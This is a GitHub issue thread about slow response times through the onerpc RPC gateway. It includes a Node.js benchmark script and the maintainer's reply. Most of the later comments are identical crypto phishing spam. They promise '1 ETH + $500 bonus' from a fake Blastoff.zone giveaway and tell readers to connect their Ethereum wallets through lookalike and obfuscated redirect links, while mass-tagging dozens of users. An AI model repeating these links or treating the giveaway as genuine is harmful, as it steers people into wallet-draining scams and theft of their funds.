### ISSUE TITLE
Slow request response time

### ISSUE THREAD

**Issue by jeremfrs** [huahuayu/onerpc#1]
First of all, thank you for your work, having a reliable RPC node is key in all infra. However i have found through my testing that RPC requests are much slower though your gateway (approximatly 10 times slower).

I think this is caused by some slow public endpoint that takes time to fail which end up slowing the request. It could be interesting to select an rpc node with some weight regarding their response time instead of picking them uniformly ?

For example, I get the following output with the code below
```
1rpc_block: 45.014s
any_block: 2.077s
```

```js
var needle = require('needle');

var ENDPOINT = '';
const ENDPOINT_1RPC = 'https://1rpc.dev/chain/56';
const ENDPOINT_ANY = 'https://bsc-rpc.publicnode.com';

async function post(url, body) {
    return needle('post',
        url,
        body,
        options = {
            json: true,
        },
    ).then(r => {
        return r.body.result;   
    }
    ).catch(e => {
        console.log(e);
        throw e;
    });
}

async function getBlockByNumber(blockNumber) {
    let body = JSON.stringify({
        jsonrpc: '2.0',
        method: 'eth_getBlockByNumber',
        params: ['0x'+blockNumber.toString(16), true],
        id: 1
    });

    return post(ENDPOINT, body);
}

(async () => {
    let startBlock = 36645802;
    let endBlock = startBlock + 10;

    ENDPOINT = ENDPOINT_1RPC;
    console.time('1rpc_block');
    for(let block = startBlock; block < endBlock; block++) {
        await getBlockByNumber(block);
    }
    console.timeEnd('1rpc_block');

    ENDPOINT = ENDPOINT_ANY;
    console.time('any_block');
    for(let block = startBlock; block < endBlock; block++) {
        await getBlockByNumber(block);
    }
    console.timeEnd('any_block');
})()
```

**Comment by huahuayu** [comment]
Hi @jeremfrs I just run your code from local terminal, from my side it's not that bad. Btw the 1rpc.dev server is in HongKong, it depends on where you test it.
```
$ node index.js
1rpc_block: 10.111s
any_block: 13.006s
```

Your suggestion is good, but it has side effect, if it's weighted, although the response time will be less, however some of the nodes may get heavier load, they may get out of service easier. I'd like to secure the availability first.

**Comment by tychiadet** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
nazariyv, @trenta3, @swass812, @Th1983, @luca-moser, @izayl, @macrov, @lvyingwei, @1Bittium, @NikitaVr, @rolo, @enesbatiny, @jstzwj, @genji1037, @shurshun, @HanssonMagnus, @Kitryn, @misoobu, @sudeepdino008, @ares0x, @kidmam, @perpetuum7, @kevinho, @wk0, @schmidsi, @jaensen, @f-87, @glmaljkovich, @Clivern, @knaoe, @5aaee9, @dmitriyselivanov, @sambacha, @khoslaventures, @randxie, @infloop, @henrimahal, @robinxb, @ToJen, @stefanasandei, @Gostycw, @Destiner, @adembyon, @drakmail, @v54dt, @jamimosas, @yuliwilliam, @TranVanKung, @veox, @r44cx

**Comment by SDH-IT-HO** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
anylzer, @crypto-rizzo, @losdwind, @antoniosehk, @JULIONEGRI, @nczhu, @nanyongawinnie1, @kombu-takana, @evdenis, @feamcor, @volkyeth, @usamagas20, @japanesealexjones, @yafiabiyyu, @sianliu, @Penguin214, @dreamineering, @php1301, @minkiha, @andiputra, @8887-eth, @shakyadigbijaya, @ppanya, @apfong, @tanujdamani, @surpasslll, @fatelei, @rz-pb, @itstehkman, @CodingPeppa, @peacefulpirate, @PierrickGT, @Sweetness1122, @jfr4nc0, @arkadiuszwojcik, @nocb, @BogdanHabic, @JIEDAWA, @fourthofaugust, @ThusSpokeZarate, @suhila1010, @MonikaJassova, @iamgauravpant, @williamlsh, @dannypaton, @liamzebedee, @ncodespot, @ifvictr, @sumitpatel93, @Hen941

**Comment by jorge-nascimento** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
srib, @morgenfriedel, @zclfly, @mapio, @nompelis, @davidbehrend, @python16, @MilleniumSpark, @kravens, @JohnRyk, @ekroger, @VamsiPutheti12, @thelyo, @Mengeroshi, @adithyasunil26, @ezeql, @inchori, @gacolitti, @gklein, @antonioantunes, @renkasiyas, @joshua-rodgers, @Gilbertly, @tboronczyk, @jooddang, @mash021, @Riahiamirreza, @benoitberenger, @grinsonofdgun0147, @camaral, @pldelisle, @JAY3TN931, @tripur3121, @evanliuchina, @bliotti, @cwarny, @aravind-3105, @ben-kaufman, @a1300, @fercomunello, @ArduinoAficionado, @davidknezic, @SPQR14, @jodobear, @hussainkazemi, @phymo, @BenMorganIO, @vafanassieff, @Anamul0916, @Parklife05

**Comment by 07Owuor** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
NanneStephan, @callmewhy, @MarkTangCd, @Mehr53, @837sanketchaudhari, @pptphutho, @lajosdeme, @razum2um, @konradkubczyk, @mumenma, @erdnussflips, @seekersoftec, @Ericauto, @ll3cram, @imloama, @PetersonIhmes, @nexiz578, @showtime73, @Alkhatri77, @jinke479150, @stonegao, @talentumtuum, @MarkTangJs, @Rhime-design, @ASISBusiness, @awesome-doge, @Chesney97, @Gictorbit, @decentra1ized, @maximilianlemberg, @odrik25, @alireza-gsh, @elmayana00, @Hitosaw, @driver005, @elonmusx, @nguyendoanh99, @kia5853, @bytefly, @Isa232323, @demethrius20, @RandomlyWrite, @kangqiao, @MikiOne, @oscar066, @sekoyo, @xiaohailimao, @bitcard, @hoangpq, @Alihusainy

**Comment by masa2el** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
EgFokin, @RafaelVidaurre, @Seahorse100, @znnss, @gerardorochin, @Vialiceq, @kanema20, @l1nkey, @trigun0x2, @zrm99, @kakalid310, @liushooter, @innobrig, @MsTrZer0, @cjlchange2018, @PKUbuntu, @miguelCyclone, @itsahedge, @7a6163, @Richard-Burd, @anxiubin, @sir4ju1, @kevinho, @dolgoonnn, @maiga2735, @Min-JaeKim, @justin-wallander, @learnforpractice, @tkmct, @unofficialdxnny, @louismbenedict, @MitchellTesla, @blue1018, @Im-Kunal-13, @giangttd, @sophiarae326, @Kizyjura, @micici, @djphillyg, @alsdn2025, @tand21, @Coinward, @edebole, @msmyers, @fuhongxuelook, @KingDavid9991, @ystgs, @HelloRambo, @Ro5s, @thomasvbrown

**Comment by Mehr53** [comment]
$ node index.js
1rpc_block: 10.111s
any_block: 13.006s
